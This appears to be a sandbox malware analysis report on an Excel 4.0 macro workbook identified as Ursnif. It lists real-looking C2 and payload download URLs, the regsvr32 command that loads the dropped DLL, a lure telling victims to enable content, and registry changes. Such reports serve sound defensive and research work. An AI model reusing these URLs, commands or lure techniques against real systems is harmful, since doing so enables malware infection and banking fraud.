Source: msapplication.xml5.18.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.18.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.18.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
(The msapplication.xml files are Internet Explorer's pinned-site tile configuration for its default favorites, written by process 18, one of the iexplore.exe instances; they are not artifacts of the sample.)
Source: unknown | DNS traffic detected: queries for: docs.atu.ngr.mybluehost.me
Source: global traffic | HTTP traffic detected (404 response; the ASCII rendering in the original report was unreadable because the body is chunked and gzip-compressed: chunk size 0x6a, gzip magic 1f 8b 08):
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Mon, 03 May 2021 17:49:26 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Vary: Accept-Encoding
  Content-Encoding: gzip
  Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
Source: {E4D8D280-AC37-11EB-90EB-ECF4BBEA1588}.dat.18.dr, ~DFEF08F5C4CE8758CE.TMP.18.dr | String found in binary or memory: http://app.buboleinov.com/z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf
Source: {0D9072B2-AC38-11EB-90EB-ECF4BBEA1588}.dat.27.dr, ~DFC4112F6E645ECEC7.TMP.27.dr | String found in binary or memory: http://app3.maintorna.com/F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/
Source: {FF57CED8-AC37-11EB-90EB-ECF4BBEA1588}.dat.24.dr, ~DFE7296AD5C85F4BE9.TMP.24.dr | String found in binary or memory: http://chat.billionady.com/pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVK
(The three C2 URLs survive in Internet Explorer index and cache files written by processes 18, 24 and 27, the three iexplore.exe instances in the Startup tree, consistent with the beacons having been issued through those browser instances.)
Source: sharedStrings.bin | String found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dll (the first-stage download URL is stored as a cell value in the workbook's shared string table rather than inside the macro formulas)
Source: msapplication.xml.18.dr through msapplication.xml7.18.dr | Strings found in binary or memory (Internet Explorer's default pinned-site tiles, written by iexplore.exe; not sample artifacts):
  http://www.amazon.com/ (msapplication.xml.18.dr)
  http://www.google.com/ (msapplication.xml1.18.dr)
  http://www.live.com/ (msapplication.xml2.18.dr)
  http://www.nytimes.com/ (msapplication.xml3.18.dr)
  http://www.reddit.com/ (msapplication.xml4.18.dr)
  http://www.twitter.com/ (msapplication.xml5.18.dr)
  http://www.wikipedia.com/ (msapplication.xml6.18.dr)
  http://www.youtube.com/ (msapplication.xml7.18.dr)
Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr (a file dropped by EXCEL.EXE, process 0) | Strings found in binary or memory. These are Microsoft Office and Microsoft online-service endpoints that Office embeds in its own data files; they are not indicators for this sample:
  http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
  http://weather.service.msn.com/data.aspx
  https://addinsinstallation.store.office.com/app/download
  https://addinsinstallation.store.office.com/appinstall/preinstalled
  https://addinslicensing.store.office.com/commerce/query
  https://analysis.windows.net/powerbi/api
  https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  https://api.aadrm.com/
  https://api.addins.omex.office.net/appinfo/query
  https://api.addins.omex.office.net/appstate/query
  https://api.addins.store.office.com/app/query
  https://api.cortana.ai
  https://api.diagnostics.office.com
  https://api.diagnosticssdf.office.com
  https://api.microsoftstream.com/api/
  https://api.office.net
  https://api.onedrive.com
  https://api.powerbi.com/beta/myorg/imports
  https://api.powerbi.com/v1.0/myorg/datasets
  https://api.powerbi.com/v1.0/myorg/groups
  https://apis.live.net/v5.0/
  https://arc.msn.com/v4/api/selection
  https://asgsmsproxyapi.azurewebsites.net/
  https://augloop.office.com
  https://augloop.office.com/v2
  https://autodiscover-s.outlook.com/
  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
  https://cdn.entity.
  https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
  https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
  https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
  https://client-office365-tas.msedge.net/ab
  https://clients.config.office.net/
  https://clients.config.office.net/user/v1.0/android/policies
  https://clients.config.office.net/user/v1.0/ios
  https://clients.config.office.net/user/v1.0/mac
  https://clients.config.office.net/user/v1.0/tenantassociationkey
  https://cloudfiles.onenote.com/upload.aspx
  https://config.edge.skype.com
  https://config.edge.skype.com/config/v1/Office
  https://config.edge.skype.com/config/v2/Office
  https://cortana.ai
  https://cortana.ai/api
  https://cr.office.com
  https://dataservice.o365filtering.com
  https://dataservice.o365filtering.com/
  https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
  https://dev.cortana.ai
  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
  https://dev0-api.acompli.net/autodetect
  https://devnull.onenote.com
  https://directory.services.
  https://ecs.office.com/config/v2/Office
  https://entitlement.diagnostics.office.com
  https://entitlement.diagnosticssdf.office.com
  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
  https://globaldisco.crm.dynamics.com
  https://graph.ppe.windows.net
  https://graph.ppe.windows.net/
  https://graph.windows.net
  https://graph.windows.net/
  https://hubblecontent.osi.office.net/contentsvc/api/telemetry
  https://hubblecontent.osi.office.net/contentsvc/browse?
  https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
  https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
  https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
  https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
  https://hubblecontent.osi.office.net/contentsvc/microsofticon?
  https://incidents.diagnostics.office.com
  https://incidents.diagnosticssdf.office.com
  https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
  https://insertmedia.bing.office.net/odc/insertmedia
  https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
  https://lifecycle.office.com
  https://login.microsoftonline.com/
  https://login.windows-ppe.net/common/oauth2/authorize
  https://login.windows.local
  https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
  https://login.windows.net/common/oauth2/authorize
  https://loki.delve.office.com/api/v1/configuration/officewin32/
  https://lookup.onenote.com/lookup/geolocation/v1
  https://management.azure.com
  https://management.azure.com/
  https://messaging.office.com/
  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
  https://ncus.contentsync.
  https://ncus.pagecontentsync.
  https://o365auditrealtimeingestion.manage.office.com
  https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
  https://o365diagnosticsppe-web.cloudapp.net
  https://ocos-office365-s2s.msedge.net/ab
  https://ofcrecsvcapi-int.azurewebsites.net/
  https://officeapps.live.com
  https://officeci.azurewebsites.net/api/
  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
  https://officesetup.getmicrosoftkey.com
  https://ogma.osi.office.net/TradukoApi/api/v1.0/
  https://omex.cdn.office.net/addinclassifier/officeentities
  https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
  https://onedrive.live.com
  https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://onedrive.live.com/embed?
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office365.com/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://powerlift.acompli.net
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://settings.outlook.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://shell.suite.office.com:1443
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://staging.cortana.ai
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.office.com/addinstemplate
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.office.de/addinstemplate
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://tasks.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://templatelogging.office.com/client/log
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://webshell.suite.office.com
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://wus2.contentsync.
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://wus2.pagecontentsync.
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                Source: 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drString found in binary or memory: https://www.odwebp.svc.ms

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
    Source: Yara match | File source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
    Source: Yara match | File source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
Yara detected Ursnif
    Source: Yara match | File source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
    Source: Yara match | File source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
    Source: Yara match | File source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
    Source: Yara match | File source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
    Source: Yara match | File source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
    Source: Yara match | File source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
    Source: Yara match | File source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
    Source: Yara match | File source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
    Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
    Source: Yara match (the same two rule hits and file sources as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 4 | Screenshot OCR: Enable Editing 9 10 from the yellow bar above 11 12 [i] Once You have Enable Editing, please cli
    Source: Screenshot number: 4 | Screenshot OCR: Enable Content 13 from the yellow bar above 14 15 / , :: WHY I CANNOT OPEN THIS DOCUMENT? ' 1
Found Excel 4.0 Macro with suspicious formulas
    Source: 6613n246zm543w.xlsb | Initial sample: EXEC
    Source: 6613n246zm543w.xlsb | Initial sample: CALL
Found abnormal large hidden Excel 4.0 Macro sheet
    Source: 6613n246zm543w.xlsb | Initial sample: Sheet size: 25180
    Source: 6613n246zm543w.xlsb | Initial sample: Sheet size: 45240
    Source: 6613n246zm543w.xlsb | Initial sample: Sheet size: 38015
Office process drops PE file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\Public\block.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll
Writes or reads registry keys via WMI
    Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
    Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
    Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
    Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
    Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DB18D1 GetProcAddress,NtCreateSection,memset, 1_2_66DB18D1
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DB1B89 NtMapViewOfSection, 1_2_66DB1B89
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DB2485 NtQueryVirtualMemory, 1_2_66DB2485
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DB2264 1_2_66DB2264
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DF348A 1_2_66DF348A
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DE7AD7 1_2_66DE7AD7
    Source: Joe Sandbox View | Dropped File: C:\Users\Public\block.dll 8A26C32848C9EA085505359F67927D1A744EC07303ED0013E592ECA6B4DF4790
    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll 8A26C32848C9EA085505359F67927D1A744EC07303ED0013E592ECA6B4DF4790
    Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
    Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSB@12/59@4/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{2CCBB9CE-342A-4F78-A4D3-93ED91BA9B6E} - OProcSessId.dat
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
    Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll
    Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
    Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2
    Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
    Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5828 CREDAT:17410 /prefetch:2
    Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
    Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4996 CREDAT:17410 /prefetch:2
    Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: 6613n246zm543w.xlsb | Initial sample: OLE zip file path = xl/media/image1.png
    Source: 6613n246zm543w.xlsb | Initial sample: OLE zip file path = xl/media/image2.png
    Source: 6613n246zm543w.xlsb | Initial sample: OLE zip file path = xl/media/image3.png
    Source: 6613n246zm543w.xlsb | Initial sample: OLE zip file path = xl/media/image4.png
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll.0.dr
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DB1F31 LoadLibraryA,GetProcAddress, 1_2_66DB1F31
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\Users\Public\block.dll
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DB2253 push ecx; ret 1_2_66DB2263
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DB2200 push ecx; ret 1_2_66DB2209
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DBFE6C push ebx; retf 1_2_66DBFE6D
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DC677F push esi; iretd 1_2_66DC678A
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DE4475 push ecx; ret 1_2_66DE4488
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DC446A push esi; ret 1_2_66DC446B
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DC2403 push ebp; retf 1_2_66DC244E
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DC243F push ebp; retf 1_2_66DC244E
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DC5B7B push eax; ret 1_2_66DC5B7C
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DC633B push edx; retf 1_2_66DC6345
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DFD33E push dword ptr [ecx+4BFFD4DAh]; retf 1_2_66DFD348
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DFE175 push ds; iretd 1_2_66DFE179
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\Public\block.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll

Boot Survival:

Drops PE files to the user root directory
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\Public\block.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
    Source: Yara match (the same two rule hits and file sources as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)
    Source: C:\Windows\SysWOW64\regsvr32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872 | Thread sleep count: 31 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872 | Thread sleep count: 35 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872 | Thread sleep count: 36 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5872 | Thread sleep count: 203 > 30
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DB1F31 LoadLibraryA,GetProcAddress, 1_2_66DB1F31
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DFBFB5 mov eax, dword ptr fs:[00000030h] 1_2_66DFBFB5
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DFBAF2 push dword ptr fs:[00000030h] 1_2_66DFBAF2
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 1_2_66DFBEEB mov eax, dword ptr fs:[00000030h] 1_2_66DFBEEB
    Source: regsvr32.exe, 00000001.00000002.1014107738.0000000002D00000.00000002.00000001.sdmp | Binary or memory string: Program Manager
    Source: regsvr32.exe, 00000001.00000002.1014107738.0000000002D00000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
    Source: regsvr32.exe, 00000001.00000002.1014107738.0000000002D00000.00000002.00000001.sdmp | Binary or memory string: Progman
    Source: regsvr32.exe, 00000001.00000002.1014107738.0000000002D00000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 1_2_66DB1566
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 1_2_66DF5C41
    Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 1_2_66DEF574
                Source: C:\Windows\SysWOW64\regsvr32.exe  Code function: 1_2_66DED27D ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW
                Source: C:\Windows\SysWOW64\regsvr32.exe  Code function: 1_2_66DEFBE2 __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num
